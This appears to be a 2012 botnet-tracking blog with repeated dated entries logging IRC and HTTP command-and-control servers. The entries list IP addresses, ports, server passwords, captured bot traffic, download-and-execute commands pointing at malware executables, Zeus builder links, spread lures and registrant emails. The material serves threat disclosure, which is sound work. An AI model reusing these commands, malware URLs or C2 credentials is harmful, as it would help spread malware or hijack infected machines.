Remote Host Port Number
190.98.219.21 80
199.15.234.7 80
74.62.152.160 6060 PASS secret
Local users: Current Local Users: 283 Max: 2070
Global users: Current Global Users: 283 Max: 1422
NICK n{US|XPa}scmyjzc
USER scmyjzc 0 0 :scmyjzc
PONG :7D743289
JOIN #hell secret
PRIVMSG #hell :[d="http://www.lomopalta.com/plugins/new.exe" s="176128 bytes"] Updated bot file "C:\Documents and Settings\UserName\Application Data\Scxaxs.exe" - Download retries: 0
hosting infos:
http://whois.domaintools.com/74.62.152.160
Friday, March 16, 2012
Tuesday, March 13, 2012
nhg.knaqu.eu(irc botnet hosted in Denmark Tranbjerg Tdc A/s)
same guy run this botnet http://www.exposedbotnets.com/2010/04/ds32v7k3knaqueu.html
Resolved : [nhg.knaqu.eu] To [62.243.224.85]
Remote Host Port Number
62.243.224.85 4244 PASS NhG
MODE [USA|NhGXP|031763] -ix
JOIN #!En!# #xp
PRIVMSG #!en!# :MSN: Thread Activated, Sending Message.
PONG HTTP1.4
NICK [USA|NhGXP|031763]
USER xyygsge * 0 :COMPUTERNAME
Now talking in #!en!#
Topic On: [ #!en!# ] [ .msn look here is your Photos :D :D http://kenangrafik.com/photo.php ]
Topic By: [ NhG ]
Now talking in #debug#
Topic On: [ #debug# ] [ !NAZEL http://kenangrafik.com/photo.php -n ]
Topic By: [ a ]
hosting infos:
http://whois.domaintools.com/62.243.224.85
Resolved : [nhg.knaqu.eu] To [62.243.224.85]
Remote Host Port Number
62.243.224.85 4244 PASS NhG
MODE [USA|NhGXP|031763] -ix
JOIN #!En!# #xp
PRIVMSG #!en!# :MSN: Thread Activated, Sending Message.
PONG HTTP1.4
NICK [USA|NhGXP|031763]
USER xyygsge * 0 :COMPUTERNAME
Now talking in #!en!#
Topic On: [ #!en!# ] [ .msn look here is your Photos :D :D http://kenangrafik.com/photo.php ]
Topic By: [ NhG ]
Now talking in #debug#
Topic On: [ #debug# ] [ !NAZEL http://kenangrafik.com/photo.php -n ]
Topic By: [ a ]
hosting infos:
http://whois.domaintools.com/62.243.224.85
fesko-cheats.ru(G-Bot hosted in Ukraine Kiev Private Joint Stock Company Datagroup)
G-Bot the http malware from russia with love
The bot owner try to hide via legit board wich is fesko-cheats.ru
Panel is located here http://fesko-cheats.ru/panel/login.php
HTTP Query Text
fesko-cheats.ru GET /panel/getcmd.php?id=951725031&traff=0 HTTP/1.1
Sample
hosting infos:
http://whois.domaintools.com/93.183.203.79
The bot owner try to hide via legit board wich is fesko-cheats.ru
Panel is located here http://fesko-cheats.ru/panel/login.php
HTTP Query Text
fesko-cheats.ru GET /panel/getcmd.php?id=951725031&traff=0 HTTP/1.1
Sample
hosting infos:
http://whois.domaintools.com/93.183.203.79
sw.l33t-milf.info( 100k reptile bots spreading via ms exploit)
This is one of the biggest irc botnets still active 13 leafs full of bots
I estimated the botnet size to 100k considering the number of leafs 13 but the real size can be bigger
Domain names used to control bots:
sw.l33t-milf.info
pics.l33t-ppl.info
Resolved : [sw.l33t-milf.info] To [95.48.93.250]
Resolved : [sw.l33t-milf.info] To [85.159.163.42]
Resolved : [sw.l33t-milf.info] To [208.125.158.219]
Resolved : [sw.l33t-milf.info] To [212.170.205.179]
Resolved : [sw.l33t-milf.info] To [80.2.60.232]
Resolved : [sw.l33t-milf.info] To [192.117.148.103]
Resolved : [sw.l33t-milf.info] To [46.214.145.230]
Resolved : [sw.l33t-milf.info] To [94.156.162.165]
Resolved : [sw.l33t-milf.info] To [59.180.210.189]
Resolved : [sw.l33t-milf.info] To [89.228.97.248]
Resolved : [sw.l33t-milf.info] To [189.35.205.123]
Resolved : [sw.l33t-milf.info] To [211.72.230.83]
Resolved : [sw.l33t-milf.info] To [139.91.102.100]
Resolved : [pics.l33t-ppl.info] To [211.72.230.83]
Resolved : [pics.l33t-ppl.info] To [212.170.205.179]
Resolved : [pics.l33t-ppl.info] To [192.117.148.103]
Resolved : [pics.l33t-ppl.info] To [94.156.162.165]
Resolved : [pics.l33t-ppl.info] To [189.35.205.123]
Resolved : [pics.l33t-ppl.info] To [208.125.158.219]
Resolved : [pics.l33t-ppl.info] To [89.228.97.248]
Resolved : [pics.l33t-ppl.info] To [85.159.163.42]
Resolved : [pics.l33t-ppl.info] To [46.214.145.230]
Resolved : [pics.l33t-ppl.info] To [81.94.153.174]
Resolved : [pics.l33t-ppl.info] To [95.48.93.250]
Resolved : [pics.l33t-ppl.info] To [59.180.210.189]
Resolved : [pics.l33t-ppl.info] To [80.2.60.232]
irc server:
sw.l33t-milf.info:6667
Now talking in #sw#
Topic On: [#sw# ] [ .dl http://dl.dropbox.com/u/66752663/v/f/ms.exe 12]
Topic By: [ Deno ]
Modes On: [ #sw# ] [ +smntMu ]
(VV) .sort
(VV) .sort
Now talking in #USA
Topic On: [ #usa ] [ .msn ATTENTION! You are infected with a msn worm, which may cause damage or in some cases loss of your files, we reccomend you download and use our free remover http://goo.gl/d7vwY ]
Topic By: [ Deno ]
pics.l33t-ppl.info:6667
NICK {iNF-00-USA-XP-COMP-2129}
USER TbT * 0 :COMP
JOIN ##TBT
NICK {00-USA-XP-COMP-5805}
PRIVMSG {00-USA-XP-COMP-..@ :[Current task] Idling [System uptime] 0 days (00 hours & 01 mins) [Bot Uptime] 0 days (00 hours & 00 mins)
Now talking in ##TBT
Topic O: [ ##TBT ] [ .scan SVRSVC_BRUTE 100 5 0 -b -r ]
Topic By: [ Deno ]
Modes On: [ ##TBT ] [ +smntMuN 12]
Samples:
Download
Download
Download
Download
Download
alot of people claiming to be "coders" around hecking boards say that ircd is dead is old etc but look at irc here 13 leafs full of infected machines exploiting windows vulnerabilities
this reptile mod by the owner of this botnet wich is named Dee is better then any "private" bot like ngrBot or other shit being sold around
Domain owners:
http://whois.domaintools.com/l33t-milf.info
http://whois.domaintools.com/l33t-ppl.info theyre both registered with http://www.enom.com
let's see if eNom will shut them down or just ignore the abuses i allready send to them
Emails used to register these domains:
Domain Name:L33T-PPL.INFO
Admin Email:admin.dalnet@gmail.com
Domain Name:L33T-MILF.INFO
Admin Email:i78@hotmail.com
I estimated the botnet size to 100k considering the number of leafs 13 but the real size can be bigger
Domain names used to control bots:
sw.l33t-milf.info
pics.l33t-ppl.info
Resolved : [sw.l33t-milf.info] To [95.48.93.250]
Resolved : [sw.l33t-milf.info] To [85.159.163.42]
Resolved : [sw.l33t-milf.info] To [208.125.158.219]
Resolved : [sw.l33t-milf.info] To [212.170.205.179]
Resolved : [sw.l33t-milf.info] To [80.2.60.232]
Resolved : [sw.l33t-milf.info] To [192.117.148.103]
Resolved : [sw.l33t-milf.info] To [46.214.145.230]
Resolved : [sw.l33t-milf.info] To [94.156.162.165]
Resolved : [sw.l33t-milf.info] To [59.180.210.189]
Resolved : [sw.l33t-milf.info] To [89.228.97.248]
Resolved : [sw.l33t-milf.info] To [189.35.205.123]
Resolved : [sw.l33t-milf.info] To [211.72.230.83]
Resolved : [sw.l33t-milf.info] To [139.91.102.100]
Resolved : [pics.l33t-ppl.info] To [211.72.230.83]
Resolved : [pics.l33t-ppl.info] To [212.170.205.179]
Resolved : [pics.l33t-ppl.info] To [192.117.148.103]
Resolved : [pics.l33t-ppl.info] To [94.156.162.165]
Resolved : [pics.l33t-ppl.info] To [189.35.205.123]
Resolved : [pics.l33t-ppl.info] To [208.125.158.219]
Resolved : [pics.l33t-ppl.info] To [89.228.97.248]
Resolved : [pics.l33t-ppl.info] To [85.159.163.42]
Resolved : [pics.l33t-ppl.info] To [46.214.145.230]
Resolved : [pics.l33t-ppl.info] To [81.94.153.174]
Resolved : [pics.l33t-ppl.info] To [95.48.93.250]
Resolved : [pics.l33t-ppl.info] To [59.180.210.189]
Resolved : [pics.l33t-ppl.info] To [80.2.60.232]
irc server:
sw.l33t-milf.info:6667
Now talking in #sw#
Topic On: [#sw# ] [ .dl http://dl.dropbox.com/u/66752663/v/f/ms.exe 12]
Topic By: [ Deno ]
Modes On: [ #sw# ] [ +smntMu ]
(VV) .sort
(VV) .sort
Now talking in #USA
Topic On: [ #usa ] [ .msn ATTENTION! You are infected with a msn worm, which may cause damage or in some cases loss of your files, we reccomend you download and use our free remover http://goo.gl/d7vwY ]
Topic By: [ Deno ]
pics.l33t-ppl.info:6667
NICK {iNF-00-USA-XP-COMP-2129}
USER TbT * 0 :COMP
JOIN ##TBT
NICK {00-USA-XP-COMP-5805}
PRIVMSG {00-USA-XP-COMP-..@ :[Current task] Idling [System uptime] 0 days (00 hours & 01 mins) [Bot Uptime] 0 days (00 hours & 00 mins)
Now talking in ##TBT
Topic O: [ ##TBT ] [ .scan SVRSVC_BRUTE 100 5 0 -b -r ]
Topic By: [ Deno ]
Modes On: [ ##TBT ] [ +smntMuN 12]
Samples:
Download
Download
Download
Download
Download
alot of people claiming to be "coders" around hecking boards say that ircd is dead is old etc but look at irc here 13 leafs full of infected machines exploiting windows vulnerabilities
this reptile mod by the owner of this botnet wich is named Dee is better then any "private" bot like ngrBot or other shit being sold around
Domain owners:
http://whois.domaintools.com/l33t-milf.info
http://whois.domaintools.com/l33t-ppl.info theyre both registered with http://www.enom.com
let's see if eNom will shut them down or just ignore the abuses i allready send to them
Emails used to register these domains:
Domain Name:L33T-PPL.INFO
Admin Email:admin.dalnet@gmail.com
Domain Name:L33T-MILF.INFO
Admin Email:i78@hotmail.com
Monday, March 12, 2012
122.226.202.225(irc botnet hosted in China Shaoxing Dingqi Internet Science Co. Ltd)
Remote Host Port Number
122.226.202.225 4802 PASS hax0r
Nick:n{US|XPa}okmignn
Channel:#ang ngrBot
hosting infos:
http://whois.domaintools.com/122.226.202.225
122.226.202.225 4802 PASS hax0r
Nick:n{US|XPa}okmignn
Channel:#ang ngrBot
hosting infos:
http://whois.domaintools.com/122.226.202.225
i.nerashti.net(irc botnet hosted in India Delhi Mtnl Cat B Isp)
Resolved : [i.nerashti.net] To [59.180.210.189]
Remote Host Port Number
107.20.135.4 80
107.20.138.135 80
199.15.234.7 80
59.180.210.189 4244 PASS 666666
80.2.60.232 6667 PASS 666666
PRIVMSG #buli# :[d="http://dl.dropbox.com/u/66711623/v/e/rundat.exe" s="92160 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0
NICK n{US|XPa}eechxgg
USER eechxgg 0 0 :eechxgg
JOIN #BuLi# redem
PRIVMSG #buli# :[MSN]: Updated MSN spread interval to "4"
PRIVMSG #buli# :[MSN]: Updated MSN spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com"
PRIVMSG #buli# :[HTTP]: Updated HTTP spread interval to "3"
PRIVMSG #buli# :[HTTP]: Updated HTTP spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com |"
NICK {NEW}[USA][XP]705470
USER 9458 "" "lol" :9458
PONG :AB40B197
JOIN #sw#
PRIVMSG #sw# :Executed process successfully.
hosting infos:
http://whois.domaintools.com/59.180.210.189
Remote Host Port Number
107.20.135.4 80
107.20.138.135 80
199.15.234.7 80
59.180.210.189 4244 PASS 666666
80.2.60.232 6667 PASS 666666
PRIVMSG #buli# :[d="http://dl.dropbox.com/u/66711623/v/e/rundat.exe" s="92160 bytes"] Executed file "C:\Documents and Settings\UserName\Application Data\1.exe" - Download retries: 0
NICK n{US|XPa}eechxgg
USER eechxgg 0 0 :eechxgg
JOIN #BuLi# redem
PRIVMSG #buli# :[MSN]: Updated MSN spread interval to "4"
PRIVMSG #buli# :[MSN]: Updated MSN spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com"
PRIVMSG #buli# :[HTTP]: Updated HTTP spread interval to "3"
PRIVMSG #buli# :[HTTP]: Updated HTTP spread message to "Obama killed Photos http://kenangrafik.com/viewimages.php?=www.facebook.com |"
NICK {NEW}[USA][XP]705470
USER 9458 "" "lol" :9458
PONG :AB40B197
JOIN #sw#
PRIVMSG #sw# :Executed process successfully.
hosting infos:
http://whois.domaintools.com/59.180.210.189
Saturday, March 10, 2012
vps1.imafish.net(ngrBot hosted in United States Input Output Flood Llc)
Resolved : [vps1.imafish.net] To [199.30.49.171]
Local users: Current Local Users: 47 Max: 132
Global users: Current Global Users: 47 Max: 132
C&C Server: 199.30.49.171:6667
Server Password:
Username: hewjcgy
Nickname: n{DE|XPa}hewjcgy
Channel: #botn (Password: ngrBot)
Channeltopic: :
Topic On: [ #botn ] [ ]
Topic By: [ MagicSata ]
hosting infos:
http://whois.domaintools.com/199.30.49.171
Local users: Current Local Users: 47 Max: 132
Global users: Current Global Users: 47 Max: 132
C&C Server: 199.30.49.171:6667
Server Password:
Username: hewjcgy
Nickname: n{DE|XPa}hewjcgy
Channel: #botn (Password: ngrBot)
Channeltopic: :
Topic On: [ #botn ] [ ]
Topic By: [ MagicSata ]
hosting infos:
http://whois.domaintools.com/199.30.49.171
Wednesday, March 7, 2012
zxz666.darktech.org(zeus hosted in Russian Federation Moscow Ojsc Vimpelcom)
zeus sample here http://zxz666.darktech.org/zeus/builder/bot.exe
zeus config file here http://zxz666.darktech.org/zeus/builder/cfg2.bin
when u open zxz666.darktech.org u are redirected to vkontakte.ru wich ask for login
maybe masking atempt or vkontakte.ru is now used to control zeus bots
zeus samples just in case they get deleted by the hecker
hosting infos:
http://whois.domaintools.com/93.80.96.91
zeus config file here http://zxz666.darktech.org/zeus/builder/cfg2.bin
when u open zxz666.darktech.org u are redirected to vkontakte.ru wich ask for login
maybe masking atempt or vkontakte.ru is now used to control zeus bots
zeus samples just in case they get deleted by the hecker
hosting infos:
http://whois.domaintools.com/93.80.96.91
174.59.20.100(irc botnet hosted in United States Tunkhannock Comcast Cable Communications Inc)
Remote Host Port Number
174.59.20.100 4244
JOIN #vnc# d34th
PRIVMSG #vnc# :
14,1.:[
15,1rAGEBoT
14,1]:.
15,1 range: 59.x.x.x with 94 threads. (autorooting)
PONG irc.undernet.org
hosting infos:
http://whois.domaintools.com/174.59.20.100
174.59.20.100 4244
JOIN #vnc# d34th
PRIVMSG #vnc# :
14,1.:[
15,1rAGEBoT
14,1]:.
15,1 range: 59.x.x.x with 94 threads. (autorooting)
PONG irc.undernet.org
hosting infos:
http://whois.domaintools.com/174.59.20.100
Tuesday, March 6, 2012
216.246.124.44(irc botnet hosted in United States Chicago Hostforweb Inc)
Remote Host Port Number
216.246.124.44 2345
NICK New[USA|00|P|41019]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-6548 * 0 :COMPUTERNAME
MODE New[USA|00|P|41019] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/216.246.124.44
216.246.124.44 2345
NICK New[USA|00|P|41019]
PRIVMSG #!loco! :[M]: Thread Disabled.
PRIVMSG #!loco! :[M]: Thread Activated: Sending Message With Email.
USER XP-6548 * 0 :COMPUTERNAME
MODE New[USA|00|P|41019] -ix
JOIN #!loco!
PONG 22 MOTD
hosting infos:
http://whois.domaintools.com/216.246.124.44
Subscribe to:
Posts (Atom)